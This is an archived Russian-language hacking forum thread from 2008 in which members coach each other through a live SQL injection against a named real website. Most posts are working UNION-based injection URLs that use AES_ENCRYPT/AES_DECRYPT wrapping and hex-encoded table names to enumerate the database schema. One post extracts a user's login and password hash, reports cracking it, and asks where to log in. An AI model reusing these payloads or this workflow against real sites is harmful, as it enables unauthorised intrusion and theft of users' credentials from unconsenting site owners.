ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.05.2008, 23:21
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Элементарно Ватсон, Аес решает
cmd> POST /index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(TABLE_N AME,0x71),0x71)+from+information_schema.tables/* HTTP/1.0
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 29.05.2008 в 00:27..
|
|
|
28.05.2008, 23:22
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
Тьфу, забыл))))) спс!!!
|
|
|
|
28.05.2008, 23:43
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
А ещё,
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(column_ NAME,0x71),0x71)+from+information_schema.columns+w here+table_name=chr(39).chr(117).chr(115).chr(101) .chr(114).chr(115).chr(39)+limit+0,1/*
Так это делается? char='users'
|
|
|
|
28.05.2008, 23:47
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(column_ name,0x71),0x71)+from+information_schema.columns+w here+table_name=0x и hex_ТАБЛИЦЫ/*
например, колонки с таблицы USERS:
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(column_ name,0x71),0x71)+from+information_schema.columns+w here+table_name=0x7573657273+limit+2,1/*
Последний раз редактировалось sabe; 29.05.2008 в 00:07..
|
|
|
|
29.05.2008, 00:07
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,user+from+users/*
блин, а чё тогда не выходит???
|
|
|
|
29.05.2008, 00:17
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Не из той базы просишь
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
29.05.2008, 00:18
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
все просто..)
достаем table_schema
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(table_s chema,0x71),0x71)+from+Information_schema.tables+w here+table_name=0x7573657273/*
достаем пасс:
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(pass,0x 71),0x71)+from+test_190.users/*
ну в итоге получил пасс и логин чела. чей id=3. т.к. 1,2 нету.)
anna1;25f9e794323b453885f5181f1b624d0b
расшивровуем хеш и получаем пасс: 123456789
но токо вот где вход?)
Последний раз редактировалось sabe; 29.05.2008 в 00:32..
|
|
|
|
29.05.2008, 00:18
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
А как в найти имена баз???
|
|
|
|
29.05.2008, 00:19
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(table_s chema,0x71),0x71)+from+Information_schema.tables+w here+table_name=0x7573657273/*
обновляю пост) по чуть чуть)
Последний раз редактировалось sabe; 29.05.2008 в 01:06..
|
|
|
|
29.05.2008, 00:23
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
На100ящий
table_schema+from+information_schema.tables+where+ table_name=... табличка
советую почитать https://forum.antichat.ru/showpost.php?p=401199&postcount=17
Сообщение от sabe
достаем table_schema из таблицы USERS
Жжошь чтоле? =\
и кстате наверняка гет =(
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 29.05.2008 в 00:26..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
